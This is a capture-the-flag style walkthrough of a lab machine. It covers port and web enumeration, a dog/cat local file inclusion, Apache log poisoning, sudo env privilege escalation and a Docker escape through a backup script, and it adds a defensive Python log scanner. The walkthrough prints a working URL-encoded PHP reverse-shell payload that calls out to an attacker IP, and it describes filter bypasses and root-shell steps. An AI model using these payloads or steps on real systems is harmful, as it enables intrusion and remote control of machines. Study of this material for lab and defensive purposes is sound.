Port enumeration

nmap -p- --open -vvv -n -Pn -sS --min-rate 5000 10.130.187.87 -oG AllPorts.txt
nmap -p22,80 -sCV --min-rate 5000 10.130.187.87

Using nmap I found just two services, SSH and HTTP.

Web enumeration

ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-big.txt -e .php,.txt -u http://10.130.187.87/FUZZ

Using ffuf I found an interesting PHP file. This file is empty, so I continued exploring the other files.

Testing the page, I found that it opens a PHP file that you can specify in a GET parameter, but it has a filter that rejects any path without "dog" or "cat" in it.

So I forced an error in the page and, with this, obtained the local path to the web directory.

With this, I'm able to open the flag.php file using path traversal.

And now I can use PHP filters to get the code and obtain the first flag.

Now I try a hex-encoded null byte to bypass the .php filter, but it doesn't work. Reading the Index.php code, I found another valid GET argument in the page. So I used it to bypass the .php filter.

Using this same vuln, I found a log poisoning vuln.

NOTE
Due to the FFUF scan, I was forced to reset the machine.

Log poisoning RCE

Using this vulnerability, I inject a PHP shell into the log. With this, I'm able to execute code, and then execute a reverse shell.

/?view=dog/../../../../../../../var/log/apache2/access.log&cmd=php+-r+'$sock%3dfsockopen("192.168.138.103",9001)%3bpassthru("sh+<%263+>%263+2>%263")%3b'&ext=

With this, I found the second flag.
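As an added defensive example (not part of this writeup), the following Python scans Apache access-log lines for the indicators this chain leaves behind: traversal and null bytes in the view parameter, php:// wrappers, includes aimed at /var/log, and PHP tags in client-controlled header fields. The log lines are constructed samples, not the box's real log.

```python
import re
from urllib.parse import unquote

# Apache "combined" LogFormat.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not the box's real log); the PHP tag is a harmless marker.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /?view=dog/../../../../var/log/apache2/access.log HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?view=cat%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1024 "-" "<?php echo 1; ?>"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?view=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 2048 "-" "curl/8.0"
"""

def decode(value: str) -> str:
    """Percent-decode twice so double-encoded traversal (%252e%252e) is normalised too."""
    return unquote(unquote(value)).lower()

def classify(entry: dict) -> list[str]:
    """Indicators of LFI / log-poisoning activity in one parsed log entry."""
    path = decode(entry["path"])
    findings = []
    if "../" in path or "..\\" in path:
        findings.append("traversal")        # leaving the intended include directory
    if "\x00" in path:
        findings.append("null_byte")        # trying to cut off an appended extension
    if "php://" in path:
        findings.append("php_wrapper")      # php://filter style source disclosure
    if "/var/log/" in path:
        findings.append("log_file_target")  # include aimed at a log: poisoning precursor
    # PHP tags in client-controlled fields are what make an included log file executable.
    if any(t in f.lower() for f in (entry["ua"], entry["referer"], path) for t in ("<?php", "<?=")):
        findings.append("php_tag")
    return findings

def scan(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, raw path, findings) for every suspicious request in the log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (findings := classify(m.groupdict())):
            hits.append((m["ip"], m["path"], findings))
    return hits
```

Running `scan(SAMPLE_LOG)` flags the three requests from 10.0.0.9 and leaves the legitimate `?view=dog` request alone.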

Privilege escalation

Using sudo -l, I found that the user can run the command env as sudo. So, with this, I'm able to create a root shell. As root, I can read the third flag.

Now, as root, I read a backup script and a backup in a tar. This script creates a tar with the content of a directory called container, which doesn't exist right now, but the tar is here, so let's look at it. This looks like a Docker container hosting the web page we saw earlier. Here, I found a .git directory. To read these logs, I need a machine with git, so I copied the backup into the web dir and downloaded it to my own machine. Now, using git, I listed all the logs, but I found nothing. After this, I realised that we had been in a Docker environment all this time.

Docker escape

I just need to write a reverse shell into the script. With this, I obtained root on the machine and read the last flag.